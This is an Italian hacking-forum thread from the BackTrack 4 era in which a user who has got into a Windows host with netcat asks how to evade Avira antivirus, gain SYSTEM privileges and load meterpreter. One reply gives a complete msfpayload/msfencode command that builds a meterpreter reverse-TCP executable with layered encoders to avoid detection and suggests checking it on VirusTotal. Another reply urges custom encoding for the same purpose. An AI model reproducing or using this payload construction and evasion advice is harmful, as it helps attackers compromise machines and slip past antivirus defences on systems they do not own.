Results 1 to 7 of 7

Thread: Backtrack 4 vs Avira Antivir ??

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    21

    Default Backtrack 4 vs Avira Antivir ??

    Buongiorno a tutti

    Vorrei chiedere se qualcuno può aiutarmi con gli strumenti in backtrack 4 a bypassare Avira Antivir perche non riesco in alcun modo, non ditemi msfencode perchè ho provato un sacco di combinazioni e non funziona, sono entrato con netcat perche non lo rileva ma non sono riuscito ad acquisire i privilegi system per disattivare l'antivirus e caricare meterpreter o altro. Sapete suggerirmi altre possibilità?
    Grazie in anticipo!

  2. #2
    Junior Member 0v3rl04d's Avatar
    Join Date
    Feb 2010
    Posts
    36

    Default Re: Backtrack 4 vs Avira Antivir ??

    Che non ti funzioni msfencode la vedo dura, fossi in te proverei a cercare qualche parola chiave su youtube e su google... ti esce una marea di roba... se poi non hai trovato nulla (ma non penso proprio) allora torna quà
    //Visit My Blog//

    #######################################
    #######################################
    #######################################
    #### http://hacksecurityblog.blogspot.com/ ####
    #######################################
    #######################################
    #######################################

  3. #3
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    21

    Default Re: Backtrack 4 vs Avira Antivir ??

    Allora come ho detto non sono riuscito a trovare un modo per eludere Avir Antivir con gli strumenti di Backtrack 4 siccome presumo che altri abbiano tentato forse, potrebbero condividere i loro risultati, in giro sul web non ho trovato niente di buono (forse per colpa mia). Attendo gentili risposte possibilmente più utili e intelligenti dell'ultima.
    Grazie a tutti in anticipo.

  4. #4
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    3

    Default Riferimento: Backtrack 4 vs Avira Antivir ??

    Il trucco sta nella combinazione di più encoder e nel numero di volte in cui si encoda, prova per esempio a combinare shikataganai e call4dwordxor per un pò di volte:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=TuoIp LPORT=4444 (di default) R | ./msfencode -e x86/shikata_ga_nai -t exe -c 50 | ./msfencode -e x86/call4_dword_xor -t raw -c 30 X > cartella di destinazione del payload

    Per testarlo utilizza strumenti di scansione online come VirusTotal, così sei sicuro se va a buon fine

    Spero di esserti stato d'aiuto

  5. #5
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    21

    Default Re: Riferimento: Backtrack 4 vs Avira Antivir ??

    Scusatemi ma voi li provate i metodi che suggerite oppure buttate giù a braccio? Quel comando che hai postato è così utile che non funziona proprio ne con l'antivirus ne senza.

  6. #6

    Default Re: Backtrack 4 vs Avira Antivir ??

    Alcune combinazioni di encoders non funzionano, é normale.

    Se vuoi che un exploit non venga rilevato da antivirus prova a encodarlo con tecniche non standard, o modificalo tu stesso in modo che non sia riconoscibile.

    Se qualcosa é troppo complesso per le tue conoscenze di adesso, cerca di ampliarle studiando il soggetto specifico per capirne il funzionamento a basso livello, e poi riprova. Non c'e' nulla di sbagliato in questo, é il modo per aumentare le proprie abilità.

  7. #7
    Junior Member Focaccia's Avatar
    Join Date
    Jun 2009
    Posts
    63

    Default Re: Backtrack 4 vs Avira Antivir ??


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •